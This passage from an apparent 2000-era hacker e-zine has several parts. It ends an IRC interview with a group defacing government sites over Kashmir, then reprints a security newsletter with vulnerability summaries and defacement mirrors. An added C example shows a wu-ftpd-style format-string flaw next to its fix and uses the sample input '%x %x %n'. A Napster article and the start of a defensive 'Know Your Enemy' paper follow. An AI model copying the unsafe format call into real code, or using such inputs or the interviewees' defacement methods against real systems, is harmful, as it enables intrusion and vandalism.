      [21:08] <sniper__> =)
      [21:08] <SugarKing> some of your defacements are gov servers, any reason of targeting gov's, are you afraid to get busted?
      [21:09] <sniper__> Not really, We are not afraid to get busted for the reason that it's a good cause, secondly members are out of the feds reach ;)
      [21:10] <SugarKing> yeah of course
      [21:11] <SugarKing> you are one of, if not the only, people on attrition that I've seen that actually have a REASON
      [21:11] <SugarKing> instead of just "I 0wn j00"
      [21:11] <rave-> :)
      [21:11] *** snipah- (**************) has joined #gforce
      [21:11] <snipah-> sory i got disconnected.
      [21:11] <snipah-> US government was targetted because 1) more people view .gov's and we can do a good job in achieving th goal, we are out for. 2) We're a big angry :)
      [21:12] <snipah-> big=bit
      [21:12] *** sp1n sets mode: +o snipah-
      [21:12] <SugarKing> and it seems like you guys got some skill, seeing you don't really do any NT hacks
      [21:12] *** rpcb1nd (***************) has joined #gforce
      [21:12] *** sk0l (*****************) has joined #gforce
      [21:12] *** sp1n sets mode: +o rpcb1nd
      [21:12] *** sp1n sets mode: +o sk0l
      [21:13] <snipah-> i`m glad we don't do NT,
      [21:13] <snipah-> we are supported by a study group known as hexa labs
      [21:13] <SugarKing> what is hexa labs
      [21:13] <SugarKing> ?
      [21:13] <snipah-> Plus every member can code (usefully)
      [21:14] <snipah-> hexa labs is a study group, they find out vulnerabilities, code them (we help code)
      [21:14] <snipah-> most of it is being kept private.
      [21:14] *** sniper__ has quit IRC (Ping timeout)
      [21:14] <SugarKing> you guys ever use your own exploits when using them on defacing?
      [21:15] *** sk0l sets mode: +l 14
      [21:16] [rave-:#gforce PING]
      [21:16] <rave-> ehhe
      [21:16] <rave-> alot of times we use own exploitz
      [21:16] <SugarKing> heh
      [21:17] <rave-> sometimes we use a wuftp (b0f rulz) and bind.. but no details
      [21:17] <SugarKing> yeah b0f rules
      [21:17] <rave-> :)
      [21:17] <rave-> :)
      [21:17] <SugarKing> what do you guys think about ./hack kiddies on attrition like the Crime Boys?
      [21:18] *** snipah- has quit IRC (Ping timeout)
      [21:18] <rave-> oh
      [21:18] <rave-> we dont apreciate it, we think about just kids who dont know what to do.
      [21:19] <rave-> who thinks about computer hacking/security is just get proggies from others dudes and exploit of Dos something
      [21:19] <rave-> we think about computer security is a big culture and need to dedicate to it, studys, tests, and fucking blowing head
      [21:19] <rave-> eheh
      [21:20] <rave-> crimeboys is very poor
      [21:20] <rave-> NT hackewrs
      [21:20] <SugarKing> yeah I agree
      [21:20] <SugarKing> are most of you guys teengagers?
      [21:21] <rave-> i dunno about sniper but i have 20 yrs old
      [21:22] *** sniper__ (***************) has joined #gforce
      [21:22] <SugarKing> wb
      [21:22] *** rave- sets mode: +o sniper__
      [21:22] <sniper__> thx
      [21:22] <SugarKing> so why do you think India is solely responisible for this ordeal in Kashmir?
      [21:24] *** rpcb1nd sets mode: +l 13
      [21:24] <sniper__> because they are, 1) they are pretty lame as they don't wana listen to any one, the people want freedom but India won't let them to add to all this they rape innocent women, small children get murdered, made orphans. and they violate human rights
      [21:25] *** sp1n sets mode: +l 14
      [21:26] <SugarKing> nod
      [21:26] <SugarKing> pretty violent
      [21:27] <sniper__> yep.
      [21:27] <SugarKing> you guys plan on keep defacing and protesting till someone gets busted?
      [21:28] <sniper__> not sure, but yes we will be defacing for some while. ;)
      [21:28] <SugarKing> what do plan on accomplishing by defacing on this issue?
      [21:29] <SugarKing> to get people to realize the situation ?
      [21:29] <sniper__> yep, create global awareness, on many occasions people have asked us if kashmir is some one like kevin mitnick =)
      [21:30] <sniper__> obviously they 'kashmir' is some guy
      [21:30] <SugarKing> hahah
      [21:31] <sniper__> they thought even.
      [21:31] <SugarKing> any last comments/shout outs?:)
      [21:32] <sniper__> =]
      [21:33] <sniper__> yes
      [21:34] <SugarKing> shoot:)\
      [21:35] <sniper__> I`d like to thank mos (muslim online syndicates) for what ever they have done, Pakistan Hackers club, hexa labs for coding, attrition, munge, punkis, null, mcintyres, jerisho for fast mirroring, zillion@safemode , rr, cen, and all in @linuxsex
      [21:35] <sniper__> oh and #darknet@efnet ;)
      [21:36] <sniper__> last shouts to hwa security ;)
      [21:37] <SugarKing> hah nice, thanks for the interview:)
      [21:37] <sniper__> ah, np
      [21:39] [rave-:#gforce PING]
      
      
      @HWA

300.0 [HNS] Help Net Security News Letter #20
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://net-security.org/
      
      Net-Sec newsletter
      Issue 20 - 03.07.2000
      http://net-security.org
      
      Net-Sec is a newsletter delivered to you by Help Net Security. It covers weekly 
      roundups of security events that were in the news the past week. 
      Visit Help Net Security for the latest security news - http://www.net-security.org.
      
      
      Subscribe to this weekly digest on:
      http://www.net-security.org/text/newsletter
      
      Table of contents:
      
      1) General security news
      2) Security issues
      3) Security world
      4) Defaced archives
      
      
      
      General security news
      ---------------------
      
      
      ----------------------------------------------------------------------------
      
      SECURITY CHECKS CRASH ROUTERS
      Red-faced networking giant Cisco has been forced to warn customers that its 
      routers can crash when tested for security vulnerabilities by security scanning 
      software programs.
      Link: http://www.vnunet.com/News/1104718
      
      
      SECURE MESSAGING
      Critical Path detailed a suite of secure messaging services designed to help 
      enterprises protect information assets such as engineering drawings, financial 
      documents, and legal agreements transferred over the Internet.
      Link: http://www.infoworld.com/articles/hn/xml/00/06/26/000626hncritical.xml
      
      
      UK BACKS AWAY FROM RIP BILL
      CNN reports that the U.K. government is backing away from some of the more 
      controversial aspects of its e-mail surveillance bill (Regulation of Investigatory 
      Powers - RIP) currently under consideration in the House of Lords.
      Link: http://www.cnn.com/2000/TECH/computing/06/26/cybersnoop.idg/index.html
      
      
      CRACKED! PART 6: TALKING WITH THE ENEMY
      "Soon after rebuilding the system I started talking to someone on IRC that 
      identified themselves as the person that had cracked our system. He was 
      connecting from the same places that the cracker had been coming from and 
      seemed to know things that only the cracker would have known, so I decided 
      to take him at face value. Over the first couple of weeks we talked about a 
      variety of subjects. I have selected some of the most interesting bits and 
      grouped them together to give an idea of the flavor of the conversations. It 
      was an interesting window into the mind of someone living a very different life."
      Link: http://www.rootprompt.org/article.php3?article=588
      
      
      SCENES FROM THE "HACKERS" HOOD
      "The impression that most people fail to get from regular attacks is how trivial 
      they are," said Elias Levy, chief technology officer of SecurityFocus.com. 
      "These people tend to choose their targets pretty much at random - or 
      whoever bothers them that day, or pisses them off." 
      Link: http://www.wired.com/news/culture/0,1284,37238,00.html
      
      
      VIRUS SCAN FOR HANDHELDS
      It looks like McAfee is now offering virus scanning software for handheld 
      computers. Although there are no viruses for handhelds, there is an option 
      to infect when you sync your handheld and your PC. Contributed by Brian.
      Link: http://www.mcafee.com/wireless/handscan/default.asp?
      
      
      MATTEL AND PRIVACY
      In response to public complaints about privacy, Mattel Interactive announced 
      that the company would provide a tool that removes software that was 
      surreptitiously placed on customers' computers and is designed to transmit 
      and receive information to Mattel.
      Link: http://abcnews.go.com/sections/business/DailyNews/mattel000624.html
      
      
      BANK DETAILS SNATCHED
      A man calling himself 'Kelly' rang ABC radio station 2BL claiming he had 
      accessed company details from the GST information site www.gstassist.gov.au, 
      which contains the details of about 27,000 businesses. According to ZDnet AU, 
      he said that he simply inserted numbers between 1 and 27,000 into 
      a CGI output and it retrieved records. Contributed by Apocalyse Dow.
      Link: http://www.zdnet.com.au/zdnn/stories/zdnn_display/au0003700.html
      
      
      NIKE HIJACKING, PART II
      Nike.com hijacking received a sequel - when Nike's website was hijacked last 
      week, traffic was redirected through one man's Web servers in the U.K., 
      bogging them down and costing his Web hosting company time and money 
      (at least he says so). Now he is suing Nike and he created "Shame on Nike" 
      web site.
      Link: http://www.wired.com/news/politics/0,1283,37286,00.html
      Link: http://www.shameonnike.com/
      
      
      LOVE LETTER CREATOR CHARGED
      Onel de Guzman is charged with writing the Love Letter worm. The National 
      Bureau of Investigation will charge de Guzman with "traditional" crimes such 
      as theft and violation of a law that normally covers credit card fraud. If 
      charged, the maximum penalty is 20 years in prison. 
      
      
      COMPUTER ASSOCIATES REBUFFS SOPHOS ALLEGATIONS
      Simon Perry, Computer Associates' vice president, told Newsbytes that he 
      viewed Sophos' comments as irrelevant, adding that the approach his firm 
      takes with warning customers about viruses is to warn them of any potential 
      problems, for whatever reason. "Our reporting of viruses to our customers 
      has drawn kudos, both from customers and the industry at large," he said, 
      adding that the company aims to quickly let people know what the latest 
      virus is and what the associated dangers are.
      Link: http://www.computeruser.com/news/00/06/30/news19.html
      
      
      STUDENT ADMITS GOVERNMENT ATTACKS
      A university student admitted in Boston federal court to breaking into U.S. 
      government computers including Defense Department and NASA systems. 
      Ikenna Iffih, a student at Northeastern University's College of Computer 
      Science, pleaded guilty to a series of coast-to-coast cyber attacks before 
      U.S. District Judge Robert Keeton late on Thursday. 
      Link: http://www.wired.com/news/politics/0,1283,37352,00.html
      
      
      SEGA DREAMCAST COPYRIGHT PROTECTION BROKEN
      The Dreamcast game system has been viewed as one of the most secure 
      digital entertainment systems on the market. It looks like it is not so 
      secure. A group called Utopia has broken through copyright protections 
      of the system. 
      Link: http://news.cnet.com/news/0-1005-200-2181596.html?tag=st.ne.1005.sndstry.ni
      
      
      LEE ASHURST'S POINT OF VIEW
      Lee Ashurst, accused of hacking into and sabotaging the Internet service 
      Etisalat, has filed a defamation suit in Dubai against them. He has also 
      set up a site with his opinion on the whole situation.
      Link: http://www.supportlee.4mg.com/
      
      
      ISSUE DISCLOSURE POLICY
      Lewis Z. Koch did an article on Rain Forrest Puppy's "issue disclosure policy", 
      a text dealing with reporting vulnerabilities to vendors. First version of this 
      text file was sent to Bugtraq approximately 3 weeks ago.
      Link: http://mcafee.snap.com/main/page/pcp/cd/0,85,-1716-1431464-397786,00.html
      
      
      ----------------------------------------------------------------------------
      
      
      
      Security issues
      ---------------
      
      All vulnerabilities are located at:
      http://net-security.org/text/bugs
      
      
      ----------------------------------------------------------------------------
      
      IE 5 AND EXCEL 2000, POWERPOINT 2000 VULNERABILITY
      Internet Explorer 5.01, Excel 2000 and PowerPoint under Windows 98 (suppose 
      other versions are also vulnerable, have not tested) allow executing programs 
      when viewing a web page or HTML email message - in the latter case at least 
      with IFRAME. This allows taking full control over user's computer. 
      Link: http://www.net-security.org/text/bugs/962198313,44285,.shtml
      
      
      IE 5 AND ACCESS 2000 VULNERABILITY
      Internet Explorer 5.01 and Access 2000 under Windows 98 (suppose other 
      versions are also vulnerable) allow executing programs when viewing a web 
      page or HTML email message - (in the latter case with IFRAME). This allows 
      taking full control over user's computer. 
      Link: http://www.net-security.org/text/bugs/962198423,71032,.shtml
      
      
      PATCH FOR "ACTIVE SETUP DOWNLOAD" PROBLEM
      Microsoft has released a patch that eliminates a security vulnerability in an 
      ActiveX control that ships with Microsoft Internet Explorer. The vulnerability 
      could be used to overwrite files on the computer of a user who visited a 
      malicious web site operator's site.
      Link: http://www.net-security.org/text/bugs/962463758,19962,.shtml
      
      
      DOS IN MICROSOFT WINDOWS 2000 SERVER
      Multiple ports and protocols on Microsoft Windows 2000 Server are 
      susceptible to a simple network attack which raises CPU utilization on 
      Windows 2000 Server to 100%. 
      Link: http://www.net-security.org/text/bugs/962540960,71332,.shtml
      
      
      DOS IN CHECK POINT FIREWALL-1 ON WINDOWS NT
      The SMTP Security Server component of Check Point Firewall-1 4.0 and 
      4.1 is vulnerable to a simple network-based attack which raises the 
      firewall load to 100%. 
      Link: http://www.net-security.org/text/bugs/962541047,22517,.shtml
      
      
      DOS IN MICROSOFT WINDOWS 2000 TELNET SERVER
      Microsoft Windows 2000 Server is supplied with a Telnet server for remote 
      console access. A Denial of Service vulnerability exists in this server which 
      may be exploited by a local or remote attacker. 
      Link: http://www.net-security.org/text/bugs/962541114,23868,.shtml
      
      
      BOA WEBSERVER LOCAL PATH PROBLEM
      BOA Webserver is a small fast webserver that supports only basic functions. 
      It beats the pants off of apache for speed however, the only problem is that 
      it does not do any URL parsing. It admits this (somewhere on the page it says 
      you better lock down your file system real good), but the problem still remains. 
      Basically you can specify the full local path to any file on a Boa webserver and 
      out it spits the contents. i.e.
      Link: http://www.net-security.org/text/bugs/962541273,5729,.shtml
      
      
      [MANDRAKE] WU-FTPD UPDATE
      Wu-ftpd is vulnerable to a very serious remote attack in the SITE EXEC 
      implementation. Because of user input going directly into a format string for 
      a *printf function, it is possible to overwrite important data, such as a return 
      address, on the stack.
      Link: http://www.net-security.org/text/bugs/962578199,96510,.shtml
      
      
      [MANDRAKE] - DHCP UPDATE
      The OpenBSD team discovered a vulnerability in it that allows for remote 
      exploitation by a corrupt dhcp server, (or an attacker pretending to be a dhcp 
      server). If this vulnerability is exploited, root access can be gained on the host 
      running dhcp client remotely. The problem is that input is not checked and, as 
      a result, it is possible to execute commands remotely when the network config 
      files are being written on the dhcp client.
      Link: http://www.net-security.org/text/bugs/962578323,92268,.shtml
      
      
      ----------------------------------------------------------------------------
      
      
      
      Security world
      --------------
      
      All press releases are located at:
      http://net-security.org/text/press
      
      ----------------------------------------------------------------------------
      
      CENTRAL COMMAND ANNOUNCES PERFECTSUPPORT - [26.06.2000]
      Today Central Command announced PerfectSupport, a new support service that 
      provides mission critical antivirus support and services. This subscription service 
      provides maximum virus protection to all organizations where virus prevention, 
      and malicious application recovery is critical to their operation. This premium 
      service includes unlimited toll-free phone support at any time and priority access 
      to Central Command's Emergency Virus Response Team during virus outbreaks. 
      
      Press release:
      < http://www.net-security.org/text/press/962040421,209,.shtml >
      
      ----------------------------------------------------------------------------
      
      eWEEK CHALLENGES PUBLIC TO HACK THEM - [27.06.2000]
      In its second major test of Web enterprise security, Labs Interactive, by the 
      editors of eWEEK, in conjunction with digital security services firm Guardent, has 
      created an e-commerce site and is challenging the public to hack the site at 
      openhack.com. Prize money of up to $2,500 will be awarded to the first hacker to 
      crack the site which mimics a true corporate e-commerce network, including e-mail, 
      Web server, a database application, remote access and five different operating 
      systems. The challenge goes live on June 26 and runs through the first two weeks 
      of July. 
      
      Press release:
      < http://www.net-security.org/text/press/962098245,92659,.shtml >
      
      ----------------------------------------------------------------------------
      
      GENUITY ANNOUNCES ENHANCED FIREWALL SERVICES - [27.06.2000]
      Genuity Inc., formerly GTE Internetworking, today announced significant new 
      enhancements to the Site Patrol for FireWall-1 family of managed Internet 
      security services. Designed to secure high-volume enterprise intranets and 
      e-business extranets, new leading-edge features include the industry's first High 
      Availability managed firewall service. Site Patrol uses StoneSoft Corporation's 
      award-winning StoneBeat clustering technology with dynamic load balancing to 
      ensure maximum availability, scalability and performance. In addition, a hot 
      standby, High Availability option is also available for organizations with fixed 
      throughput requirements.
      
      Press release:
      < http://www.net-security.org/text/press/962098361,38122,.shtml >
      
      ----------------------------------------------------------------------------
      
      SECOND ANNUAL GLOBAL E-SECURITY CONVENTION - [28.06.2000]
      Baltimore Technologies, a global leader in e-security solutions, today announced 
      the company's second annual Global e-Security Convention, focusing on the use 
      of e-security to deliver secure, trusted business models and applications. Global 
      e-Security 2000 is the most authoritative convention set up to educate delegates 
      on the business and technology benefits of e-security. This convention will 
      highlight PKI technology as an integral component of secure e-business with the 
      ability to unleash endless opportunities for companies worldwide.
      
      Press release:
      < http://www.net-security.org/text/press/962198599,45835,.shtml >
      
      ----------------------------------------------------------------------------
      
      CA ANNOUNCES ETRUST SINGLE SIGN-ON 6.5 - [28.06.2000]
      Computer Associates International, Inc., the world's leading eBusiness solutions 
      provider, today announced the general availability (GA) of eTrust Single Sign-On 
      (SSO) 6.5, the industry-leading secured access solution. The latest version of 
      eTrust SSO provides a comprehensive solution for eBusinesses desiring integrated 
      SSO and access control capabilities for existing client/server and Web-based 
      applications from a single product. 
      
      Press release:
      < http://www.net-security.org/text/press/962198695,70218,.shtml >
      
      ----------------------------------------------------------------------------
      
      CYLINK ANNOUNCES GENERAL RELEASE OF NETHAWK - [29.06.2000]
      On June 23, Cylink Corporation began customer shipments of its NetHawk, the 
      company's new high-speed virtual private network (VPN) appliance for secure, 
      site-to-site Internet communications. NetHawk is an Internet Protocol Security 
      (IPSec) solution that transparently integrates into the network, providing an 
      enterprise-strength combination of performance and manageability.
      
      Press release:
      < http://www.net-security.org/text/press/962275562,59227,.shtml >
      
      ----------------------------------------------------------------------------
      
      FREE LINUX FIREWALL RELEASED TO PUBLIC - [01.07.2000]
      NetMaster Networking Solutions, Inc. of Chilliwack, B.C., announced today they 
      are making their Gateway Guardian Personal Edition firewall software available 
      FREE for personal and non-profit use. It can be downloaded off their web site, 
      www.GatewayGuardian.com, and also from over 100 download sites across the 
      Internet. "We have done this to meet the increasing demand for firewall protection 
      from families adopting high-speed cable, and DSL internet connections across 
      Canada and the U.S.," said Steve Hemenway, NetMaster's Vice President of Sales 
      and Marketing. 
      
      Press release:
      < http://www.net-security.org/text/press/962464441,94200,.shtml >
      
      ----------------------------------------------------------------------------
      
      INTERPOL AND ATOMICTANGERINE ANNOUNCE ALLIANCE - [01.07.2000]
      Companies worldwide will have new access to superior intelligence in their war 
      against global cyber crime as a result of an innovative alliance between the 
      private and public sector. Working directly with Menlo Park-based venture 
      consulting powerhouse AtomicTangerine, famous Lyon, France-based Interpol has 
      initiated a special relationship designed to deliver advanced intelligence collected 
      by the law enforcement organization to corporations worldwide. Interpol is the 
      world's pre-eminent organization supporting the prevention and detection of 
      international crime. 
      
      Press release:
      < http://www.net-security.org/text/press/962550257,75895,.shtml >
      
      ----------------------------------------------------------------------------
      
      
      
      Defaced archives
      ------------------------
      
      [25.06.2000] - Washington State Department of Social and Health Services
      Original: http://maa.dshs.wa.gov/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/25/maa.dshs.wa.gov/
      
      [26.06.2000] - Epson
      Original: http://www.epson.com.cn/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/26/www.epson.com.cn/
      
      [27.06.2000] - London Fire Brigade
      Original: http://www.londonfirebrigade.gov.uk/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/27/londonfirebrigade.gov.uk/
      
      [27.06.2000] - Counterpart Consortium Turkmenistan
      Original: http://www.cpart.org
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/27/www.cpart.org/
      
      [28.06.2000] - LSU School of Social Work
      Original: http://www.socialwork.lsu.edu/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/28/www.socialwork.lsu.edu/
      
      [29.06.2000] - The Bloodhound Gang Online
      Original: http://www.bloodhoundgang.com/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/29/www.bloodhoundgang.com/
      
      [29.06.2000] - HyperHog Internet Service
      Original: http://www.hyperhog.net/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/29/www.hyperhog.net/
      
      [30.06.2000] - Banco Union Colombiano
      Original: http://www.bancounion.com.co/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/30/www.bancounion.com.co/
      
      [30.06.2000] - Philippine Association for Open Computing
      Original: http://www.passoc.org/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/30/www.passoc.org/
      
      [30.06.2000] - The Undersecretariat of Foreign Trade Turkey
      Original: http://www.foreigntrade.gov.tr/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/30/www.foreigntrade.gov..tr/
      
      [01.07.2000] - White Force
      Original: http://www.whiteforce.com/
      Defaced: http://www.attrition.org/mirror/attrition/2000/07/01/www.whiteforce.com/
      
      [01.07.2000] - College of New Caledonia
      Original: http://www.cnc.bc.ca/
      Defaced: http://www.attrition.org/mirror/attrition/2000/07/01/www.cnc.bc.ca/
      
      
      
      HNS staff
      staff@net-security.org
      http://net-security.org
      
      
      ---------------------------------------------------------------------
      To unsubscribe, e-mail: news-unsubscribe@net-security.org
      For additional commands, e-mail: news-help@net-security.org
      
      @HWA      
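
      The WU-FTPD item in the newsletter above describes client input going
      directly into a *printf format string. The following is an added example,
      not wu-ftpd source and not part of the newsletter; all function names are
      hypothetical. It puts the flawed call pattern beside the fixed one and uses
      the harmless "%%" escape to show that the input is being interpreted.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical printf-style reply helper (stands in for any server routine
 * that formats a response line). Annotating such a wrapper with
 * __attribute__((format(printf, 3, 4))) lets GCC/Clang flag the unsafe call
 * below under -Wformat-security. */
static int reply(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return r;
}

/* Flawed pattern: the client's text IS the format string, so every
 * conversion directive in it is acted on by the formatter. */
int site_exec_reply_unsafe(char *out, size_t n, const char *client_text)
{
    return reply(out, n, client_text);
}

/* Fixed pattern: constant format, client text passed as data only. */
int site_exec_reply_safe(char *out, size_t n, const char *client_text)
{
    return reply(out, n, "%s", client_text);
}

/* Count directives that would consume an argument if s were used as a
 * format string. "%%" is an escaped percent sign and consumes nothing.
 * A lone trailing '%' is counted as well, since it is malformed. */
int count_directives(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* escaped percent: skip both characters */
            s++;
            continue;
        }
        count++;
    }
    return count;
}

/* Compare both paths on one input.
 * Returns  1 if the replies differ (input was interpreted as a format),
 *          0 if they are identical,
 *         -1 if the input holds argument-consuming directives; the unsafe
 *            path is then not run at all, because doing so is undefined
 *            behaviour. */
int replies_differ(const char *client_text)
{
    char a[128], b[128];

    if (count_directives(client_text) > 0)
        return -1;
    site_exec_reply_unsafe(a, sizeof a, client_text);
    site_exec_reply_safe(b, sizeof b, client_text);
    return strcmp(a, b) != 0;
}

int main(void)
{
    /* Constructed sample inputs, not taken from any advisory. */
    const char *samples[] = { "ls -l", "100%% done", "%x %x %n" };
    char buf[128];

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        site_exec_reply_safe(buf, sizeof buf, samples[i]);
        printf("input=\"%s\" directives=%d differ=%d safe_reply=\"%s\"\n",
               samples[i], count_directives(samples[i]),
               replies_differ(samples[i]), buf);
    }
    return 0;
}
```

      The fix is the constant "%s" format; count_directives is only useful as a
      logging or review aid, not as a filter in place of the fix.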
     

301.0 [MM] NAPSTER GETS ORDERED TO BE SHUT DOWN IS THE FIGHT LOST?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Sources: Multiple
      
      ZDNet Article:
      Judge slams door on Napster

      Thu, 27 Jul 2000 08:56:41 GMT
      Lisa M. Bowman
     
     
      US district judge Marilyn Hall Patel showed little sympathy
      for the popular song-swap site, saying it was encouraging
      piracy by millions of users 
     
      A federal judge on Wednesday issued a surprise injunction requiring
      Napster to block all copyrighted music on its site. The injunction will
      go into effect midnight Friday, local time. The recording industry
      must pay a $5m bond against any financial losses Napster might
      suffer by being shut down pending trial. 
     
      Saying the recording industry is likely to prevail in its copyright
      infringement case against the popular song-sharing company, US
      district judge Marilyn Patel's ruling could, in effect, shut down the
      free music swapping service. Patel ruled unexpectedly from the
      bench immediately after a two-hour hearing, telling a packed
      courtroom her order would keep Napster from "copying or assisting
      or enabling or contributing to the copy or duplication of all
      copyrighted songs and musical compositions of which the plaintiffs
      hold rights". 
     
      The Recording Industry Association of America filed a lawsuit in
      December, just five months after Napster's launch, saying the
      company's song-sharing service promotes copyright infringement.
      The case is scheduled for trial later this year. 
     
      Patel denied a motion by Napster attorney David Boies, which
      asked her to delay the order. Outside the courtroom, Boies vowed
      an appeal and, separately, Napster executives said the company
      would file papers Thursday morning. 
     
      Boies said the order was "impossible to implement or obey" since
      Napster has not received a list of songs it is required to block. 
     
      And, while Patel's order stopped short of pulling the plug, Boies said
      the injunction could cripple the business. 
     
      "Between now and the actual trial, Napster's service obviously is
      going to be seriously curtailed [if the injunction isn't lifted]," Boies
      said, adding that a settlement, though possible, was unlikely. 
     
      RIAA general counsel Cary Sherman applauded the order, saying
      that it laid the groundwork for legal music downloads and that it
      could send a message to other song-swapping firms. 
     
      In issuing the order, Patel denied virtually every defence claim by
      Napster. The RIAA recently sued another file sharing company,
      Scour, on similar grounds. "Our hope is that the court's decision,
      which is very, very clear, and very, very strong, will send a very
      clear signal to all those other companies," Sherman said. 
     
      She said swapping songs with Napster wasn't protected under the
      Audio Home Recording Act, as the defence had argued, in part
      because it involved so many people. She added that evidence so far
      in the case, including internal Napster memos, had convinced her
      that most people used the service primarily to download copyrighted
      materials. 
     
      Patel bought the recording industry's argument that Napster resisted
      complying with federal law by failing to pay royalties to copyright
      owners. 
     
      Recording industry attorney Russell Frackman told the judge that 20
      million songs were downloaded daily, of which roughly 90 percent
      were copyrighted. He said that Napster planned to have a user base
      of 75 million users by the end of the year. 
     
      "The record companies not only get no return on their investment,
      but Napster is piggy-backing," Frackman said, adding that reining in
      the company would only become more difficult in the future. "The
      longer this goes on, your honour, the more impossible it will be for us
      and the court to do anything realistic," he continued, asking her to
      "nip this in the bud". 
     
      He also said studies showing that CD sales were rising even as
      Napster gained momentum were "weak" and "irrelevant". 
     
      At some points Patel was clearly irritated at Napster attorneys,
      challenging many of their assertions and asking them many more
      questions than she had asked the recording industry attorneys. 
     
      After reading internal Napster planning documents related to the
      case, "Pirating be damned is pretty much the sense one gets," she
      said. "Free music for the people!" she quipped, prompting chuckles
      in the courtroom. Later, Patel abruptly ended Napster's presentation
      after an exasperated Napster attorney, Daniel Johnson, told her
      "you're not listening". 
     
      "You may have a seat," Patel shot back. And he did. 
     
      After her ruling, Patel gave both sides a chance to respond. Boies
      asked Patel directly if she intended to close Napster down. 
     
      "I'm not ordering them to shut their business down. I want to make
      that clear," Patel said. 
     
      During the hearing, Patel seemed not to understand that Napster
      was not the only site that allowed users to download free music.
      When Napster attorneys pointed out that people could swap songs
      through other -- though decidedly less popular -- means, such as
      chat rooms and Gnutella, Patel challenged them, saying "but you
      have to pay". 
     
      At one point, Patel asked Johnson, "What about Gnutella, do you
      have to pay?" 
     
      Johnson told her she did not. 
     
      On Wednesday evening, company founder Shawn Fanning and
      chief exec Hank Barry held a brief Webcast to address user
      concerns. 
     
      "We will keep fighting for Napster and your right to share music
      over the Internet," Fanning said. Barry said the company would
      work through the night on a solution to an injunction he said could
      shut the service down in its current form. "Although we sharply and
      firmly disagree with the judge's decision, we understand the basis
      for it and we plan to comply." 
     
      David Coursey reckons at the end of the day, history will
      judge that Napster wasn't an advocate of "the Internet
      should be free" but a greedy bunch of corporate raiders
      trying to make their fortune off the property of others.
      
      HWA Says;
     
      "Fuck him and the horse he rode in on", I have as a result of
      exposure to material I otherwise would not have been able to sample
      purchased MORE CDs than I previously did.
      
      A true fan wants a piece of their idol, that includes the crappy
      jewel case box and the cool colour booklet that is included with
      the cd set. - Cruciphux
      
      @HWA
  
302.0 [IND] Paper: Know your enemy #1 by Lance Spitzner  
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      This is an excellent series by Lance Spitzner. I've included the
      entire set and supporting logs and docs where available. This
      is highly recommended reading by both hacker camps - Ed
      
      
      The Tools and Methodologies of the Script Kiddie 
      Know Your Enemy 

      Lance Spitzner 
      http://www.enteract.com/~lspitz/papers.html 
      Last Modified: 21 July, 2000 

      My commander used to tell me that to secure yourself against the enemy, 
      you have to first know who your enemy is. This military doctrine readily 
      applies to the world of network security. Just like the military, you have 
      resources that you are trying to protect. To help protect these resources, 
      you need to know who your threat is and how they are going to attack. This 
      article, the first of a series, does just that: it discusses the tools and 
      methodology of one of the most common and universal threats, the Script 
      Kiddie. If you or your organization has any resources connected to the 
      Internet, this threat applies to you. 

      Know Your Enemy: II focuses on how you can detect these threats, identify 
      what tools they are using and what vulnerabilities they are looking for.  
      Know Your Enemy: III focuses on what happens once they gain root.  
      Specifically, how they cover their tracks and what they do next. 
      Know Your Enemy: Forensics covers how you can analyze such an attack. 
      Finally, Know Your Enemy: Motives, the result of a group project, uncovers 
      the motives and psychology of some members of the black-hat community, in 
      their own words. 

      Who is the Script Kiddie 

      The script kiddie is someone looking for the easy kill. They are not out 
      for specific information or targeting a specific company. Their goal is to 
      gain root the easiest way possible. They do this by focusing on a small 
      number of exploits, and then searching the entire Internet for that 
      exploit. Sooner or later they find someone vulnerable. 

      Some of them are advanced users who develop their own tools and leave 
      behind sophisticated backdoors. Others have no idea what they are doing 
      and only know how to type "go" at the command prompt. Regardless of 
      their skill level, they all share a common strategy: randomly search 
      for a specific weakness, then exploit that weakness. 

      The Threat 

      It is this random selection of targets that makes the script kiddie such a 
      dangerous threat. Sooner or later your systems and networks will be 
      probed; you cannot hide from them. I know of admins who were amazed to 
      have their systems scanned when they had been up for only two days, 
      and no one knew about them. There is nothing amazing here. Most likely, 
      their systems were scanned by a script kiddie who happened to be sweeping 
      that network block. 

      If this was limited to several individual scans, statistics would be in 
      your favor. With millions of systems on the Internet, odds are that no one 
      would find you. However, this is not the case. Most of these tools are 
      easy to use and widely distributed; anyone can use them. A rapidly 
      growing number of people are obtaining these tools at an alarming rate. As 
      the Internet knows no geographic bounds, this threat has quickly spread 
      throughout the world. Suddenly, the law of numbers is turning against us. 
      With so many users on the Internet using these tools, it is no longer a 
      question of if, but when you will be probed. 

      This is an excellent example of why security through obscurity can fail 
      you. You may believe that if no one knows about your systems, you are 
      secure. Others believe that their systems are of no value, so why would 
      anyone probe them? It is these very systems that the script kiddies 
      are searching for, the unprotected system that is easy to exploit, the 
      easy kill. 

      The Methodology 

      The script kiddie methodology is a simple one. Scan the Internet for a 
      specific weakness; when you find it, exploit it. Most of the tools they 
      use are automated, requiring little interaction. You launch the tool, then 
      come back several days later to get your results. No two tools are 
      alike, just as no two exploits are alike. However, most of the tools use 
      the same strategy. First, develop a database of IPs that can be scanned. 
      Then, scan those IPs for a specific vulnerability. 

      For example, let's say a user had a tool that could exploit imap on Linux 
      systems, such as imapd_exploit.c. First, they would develop a database of 
      IP addresses that they could scan (i.e., systems that are up and 
